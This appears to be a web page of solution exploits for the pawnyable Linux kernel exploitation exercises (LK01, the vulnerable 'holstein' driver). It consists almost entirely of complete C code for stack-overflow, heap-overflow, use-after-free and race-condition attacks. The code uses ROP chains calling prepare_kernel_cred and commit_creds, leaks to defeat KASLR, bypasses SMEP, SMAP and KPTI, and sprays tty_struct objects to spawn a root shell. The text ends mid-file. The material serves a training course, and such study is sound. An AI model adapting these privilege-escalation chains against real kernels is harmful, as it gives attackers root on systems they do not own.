id="lk01-3-holstein-v3-use-after-free">LK01-3 (Holstein v3: Use-after-Free)</h2> <div class="collapsable-code"> <input id="739126845" type="checkbox" checked /> <label for="739126845"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_XOR_EAX_POP_RSP_RBP_OFFSET (0xffffffff8114fbea - KERNEL_BASE) #define PUSH_RDX_XOR_EAX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_XOR_EAX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff8114078a - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81072560 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff810eb7e4 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff81638e9b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810723c0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base, g_buf_addr; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char *argv[] = {&#34;/bin/sh&#34;, NULL}; char *envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[VULN_BUFFER_SIZE]; save_state(); int tmp_fd1 = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (tmp_fd1 &lt; 0) { return -1; } int rop_and_vtable_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (rop_and_vtable_fd &lt; 0) { return -1; } close(tmp_fd1); int tmp_tty1 = open(&#34;/dev/ptmx&#34;, O_NOCTTY); if (tmp_tty1 &lt; 0) { return -1; } read(rop_and_vtable_fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x08 * 3) - 0xc39c60; g_buf_addr = *(uint64_t *)(buf + 0x08 * 7) - 0x38; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = PUSH_RDX_XOR_EAX_POP_RSP_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(rop_and_vtable_fd, buf, sizeof(buf)); int tmp_fd2 = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (tmp_fd2 &lt; 0) { return -1; } int uaf_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (uaf_fd &lt; 0) { return -1; } close(tmp_fd2); int tty_fd = open(&#34;/dev/ptmx&#34;, O_NOCTTY); if (tty_fd &lt; 0) { return -1; } read(uaf_fd, buf, sizeof(buf)); *(uint64_t *)(buf + 8 * 3) = g_buf_addr - 0xC * 8; write(uaf_fd, buf, sizeof(buf)); ioctl(tty_fd, 0x00, g_buf_addr); return 0; }</code></pre></div> <h2 id="lk01-4-holstein-v4-race-condition">LK01-4 (Holstein v4: Race Condition)</h2> <div class="collapsable-code"> <input id="814732569" type="checkbox" checked /> <label for="814732569"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;bits/syscall.h&gt; #include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP_OFFSET \ (0xffffffff81137da8 - KERNEL_BASE) #define PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff810b13c5 - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81072580 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_RBX_RBP_OFFSET (0xffffffff813006fc - KERNEL_BASE) #define POP_RCX_RBX_RBP (kernel_base + POP_RCX_RBX_RBP_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8165094b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810723e0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) void fatal(const char* msg) { perror(msg); exit(-1); } pid_t gettid(void) { return syscall(SYS_gettid); } static int next_fd1 = -1, next_fd2 = -1; static int vuln_fd1 = -1, vuln_fd2 = -1; static int race_win = 0; void find_next_fds() { next_fd1 = open(&#34;/tmp&#34;, O_RDONLY); next_fd2 = open(&#34;/tmp&#34;, O_RDONLY); close(next_fd1); close(next_fd2); } void* race_vuln_dev(void* args) { cpu_set_t* cpu_set = (cpu_set_t*)args; if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) { fatal(&#34;sched_setaffinity&#34;); } while (1) { while (!race_win) { int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd == -1) { continue; } if (fd == next_fd2) { race_win = 1; } if (race_win == 0) { close(fd); } } if (write(next_fd1, &#34;A&#34;, 1) != 1 || write(next_fd2, &#34;a&#34;, 1) != 1) { close(next_fd1); close(next_fd2); race_win = 0; } else { vuln_fd1 = next_fd1; vuln_fd2 = next_fd2; break; } usleep(1000); } return NULL; } void* spray_ptmx(void* args) { cpu_set_t* cpu_set = (cpu_set_t*)args; if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) { fatal(&#34;sched_setaffinity&#34;); } uint64_t val = 0; uint64_t ptmx_spray[800]; for (int i = 0; i &lt; 800; ++i) { usleep(50); ptmx_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (ptmx_spray[i] == -1) { for (int j = 0; j &lt; i; ++j) { close(ptmx_spray[j]); } return (void*)-1; } if (read(vuln_fd2, &amp;val, sizeof(val)) == sizeof(val) &amp;&amp; val == 0x100005401) { for (int j = 0; j &lt; i; ++j) { close(ptmx_spray[j]); } return (void*)ptmx_spray[i]; } } for (int i = 0; i &lt; 800; ++i) { close(ptmx_spray[i]); } return (void*)-1; } int create_overlapped_fd() { pthread_t th[2]; cpu_set_t cpu[2]; char buf[0x10] = { 0, }; CPU_ZERO(&amp;cpu[0]); CPU_ZERO(&amp;cpu[1]); CPU_SET(0, &amp;cpu[0]); CPU_SET(1, &amp;cpu[1]); find_next_fds(); #if PRINT_DEBUG == 1 printf(&#34;[*] next_fd1: %d, next_fd2: %d\n&#34;, next_fd1, next_fd2); #endif pthread_create(&amp;th[0], NULL, race_vuln_dev, (void*)&amp;cpu[0]); pthread_create(&amp;th[1], NULL, race_vuln_dev, (void*)&amp;cpu[1]); pthread_join(th[0], NULL); pthread_join(th[1], NULL); #if PRINT_DEBUG == 1 printf(&#34;[*] vuln_fd1: %d, vuln_fd2: %d\n&#34;, vuln_fd1, vuln_fd2); #endif const char* kTestString = &#34;Hello,Uniguri&#34;; const size_t kTestStringLen = strlen(kTestString); int t = write(next_fd1, kTestString, kTestStringLen); t &amp;= read(next_fd2, buf, kTestStringLen); if (t != kTestStringLen || strcmp(buf, kTestString)) { fatal(&#34;Race fail&#34;); } #if PRINT_DEBUG == 1 puts(&#34;[+] race success&#34;); #endif memset(buf, 0, sizeof(buf)); write(vuln_fd1, buf, sizeof(buf)); close(vuln_fd1); usleep(2000); int loop_cnt = 0; int overlapped_ptmx_fd = (int)(uint64_t)spray_ptmx((void*)&amp;cpu[0]); while (overlapped_ptmx_fd == -1 &amp;&amp; loop_cnt++ &lt; 100) { #if PRINT_DEBUG == 1 puts(&#34;[*] Spraying ptmx on another CPU&#34;); #endif pthread_create(&amp;th[0], NULL, spray_ptmx, (void*)&amp;cpu[1]); pthread_join(th[0], (void*)&amp;overlapped_ptmx_fd); } if (overlapped_ptmx_fd == -1) { fatal(&#34;overlapped_ptmx_fd&#34;); } #if PRINT_DEBUG == 1 printf(&#34;[+] Overlap success: ptmx=%d\n&#34;, overlapped_ptmx_fd); #endif return overlapped_ptmx_fd; } uint64_t kernel_base, g_buf_addr; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main(void) { char buf[VULN_BUFFER_SIZE] = { 0, }; save_state(); create_overlapped_fd(); read(vuln_fd2, buf, sizeof(buf)); kernel_base = *(uint64_t*)(buf + 8 * 3) - 0xc3aec0; g_buf_addr = *(uint64_t*)(buf + 8 * 9) - 0x48; if ((kernel_base &amp; 0xFFF) != 0) { #if PRINT_DEBUG == 1 puts(&#34;[-] Adjust kernel_base&#34;); #endif kernel_base &amp;= (~0xFFF); } if (0xffffffff81000000 &gt; kernel_base || kernel_base &gt; 0xffffffffc0000000) { fatal(&#34;kernel_base&#34;); } #if PRINT_DEBUG == 1 printf(&#34;[+] kernel_base: 0x%lx, g_buf_addr: 0x%lx\n&#34;, kernel_base, g_buf_addr); #endif uint64_t* rop_buf = (uint64_t*)buf; *rop_buf++ = PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX_RBX_RBP; *rop_buf++ = 0; *rop_buf++ = 0; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(vuln_fd2, buf, sizeof(buf)); int overlapped_ptmx = create_overlapped_fd(); read(vuln_fd2, buf, sizeof(buf)); uint64_t tmp_kernel_base = *(uint64_t*)(buf + 8 * 3) - 0xc3aec0; if ((tmp_kernel_base &amp; 0xFFF) != 0) { tmp_kernel_base &amp;= (~0xFFF); } if (tmp_kernel_base != kernel_base) { fatal(&#34;kernel_base&#34;); } *(uint64_t*)(buf + 8 * 3) = g_buf_addr - 0xC * 8; write(vuln_fd2, buf, sizeof(buf)); ioctl(overlapped_ptmx, 0x00, g_buf_addr); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/">https://pawnyable.cafe/linux-kernel/</a></li> </ul> <hr> <h2 id="lk01-1-holstein-v1-stack-overflow">LK01-1 (Holstein v1: Stack Overflow)</h2> <div class="collapsable-code"> <input id="376251498" type="checkbox" checked /> <label for="376251498"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_without_any_mitigation.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define PREPARE_KERNEL_CRED 0xffffffff8106e240 #define COMMIT_CREDS 0xffffffff8106e390 uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } static void escalate_privilege() { void* (*prepare_kernel_cred)(int) = (void*)(PREPARE_KERNEL_CRED); void (*commit_creds)(char*) = (void*)(COMMIT_CREDS); commit_creds(prepare_kernel_cred(0)); restore_state(); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); { memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(escalate_privilege); } write(fd, buf, VULN_BUFFER_SIZE + 0x10); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="197268534" type="checkbox" checked /> <label for="197268534"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_kaslr.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff8106e240 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff8106e390 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) uint64_t kernel_base; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } static void escalate_privilege() { void* (*prepare_kernel_cred)(int) = (void*)(PREPARE_KERNEL_CRED); void (*commit_creds)(char*) = (void*)(COMMIT_CREDS); commit_creds(prepare_kernel_cred(0)); restore_state(); } static __attribute__((naked)) void get_kernel_base_and_escalate_privilege() { asm(&#34;mov %[k_base], qword ptr [rsp];\n&#34; : [k_base] &#34;=r&#34;(kernel_base)); kernel_base -= 0x1506B9; asm(&#34;jmp %[escalate_privilege];\n&#34; : : [escalate_privilege] &#34;i&#34;(escalate_privilege)); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); { memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(get_kernel_base_and_escalate_privilege); } write(fd, buf, VULN_BUFFER_SIZE + 0x10); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="462381597" type="checkbox" checked /> <label for="462381597"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_smep_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define POP_RDI 0xffffffff8127bbdc #define PREPARE_KERNEL_CRED 0xffffffff8106e240 #define XOR_RCX_RCX 0xffffffff810abef0 #define MOV_RDI_RAX_REP 0xffffffff8160c96b #define COMMIT_CREDS 0xffffffff8106e390 #define SWAPGS 0xffffffff8160bf7e #define IRETQ 0xffffffff810202af uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(POP_RDI); *rop_buf++ = 0; *rop_buf++ = (uint64_t)(PREPARE_KERNEL_CRED); *rop_buf++ = (uint64_t)(XOR_RCX_RCX); *rop_buf++ = (uint64_t)(MOV_RDI_RAX_REP); *rop_buf++ = (uint64_t)(COMMIT_CREDS); *rop_buf++ = (uint64_t)(SWAPGS); *rop_buf++ = (uint64_t)(IRETQ); *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(fd, buf, (uint64_t)rop_buf - (uint64_t)buf); return 0; }</code></pre></div> <div class="collapsable-code"> <input id="259486371" type="checkbox" checked /> <label for="259486371"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_with_smep_smap_kpti_kaslr.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #define USER_LOG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define POP_RDI_OFFSET (0xffffffff8127bbdc - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff8106e240 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define XOR_RCX_RCX_OFFSET (0xffffffff810abef0 - KERNEL_BASE) #define XOR_RCX_RCX (kernel_base + XOR_RCX_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8160c96b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff8106e390 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET (0xffffffff81800e26 - KERNEL_BASE) #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if USER_LOG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[2 * VULN_BUFFER_SIZE] = {0}; int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } save_state(); read(fd, buf, sizeof(buf)); kernel_base = ((uint64_t*)buf)[0x408 / 8] - 0x13d33c; #if USER_LOG == 1 printf(&#34;[*] kernel_base: 0x%lx\n&#34;, kernel_base); #endif memset(buf, &#39;A&#39;, VULN_BUFFER_SIZE); uint64_t* rop_buf = (uint64_t*)(buf + VULN_BUFFER_SIZE); *rop_buf++ = 0xdeadbeefcafebebe; *rop_buf++ = (uint64_t)(POP_RDI); *rop_buf++ = 0; *rop_buf++ = (uint64_t)(PREPARE_KERNEL_CRED); *rop_buf++ = (uint64_t)(XOR_RCX_RCX); *rop_buf++ = (uint64_t)(MOV_RDI_RAX_REP); *rop_buf++ = (uint64_t)(COMMIT_CREDS); *rop_buf++ = (uint64_t)(BYPASS_KPTI); *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(fd, buf, (uint64_t)rop_buf - (uint64_t)buf); return 0; }</code></pre></div> <h2 id="lk01-2-holstein-v2-heap-overflow">LK01-2 (Holstein v2: Heap Overflow)</h2> <div class="collapsable-code"> <input id="821376549" type="checkbox" checked /> <label for="821376549"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_POP_RSP_R13_RBP_OFFSET (0xffffffff813a478a - KERNEL_BASE) #define PUSH_RDX_POP_RSP_R13_RBP (kernel_base + PUSH_RDX_POP_RSP_R13_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff810d748d - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81074650 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8113c1c4 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8162707b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810744b0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base, g_buf_addr; uint64_t 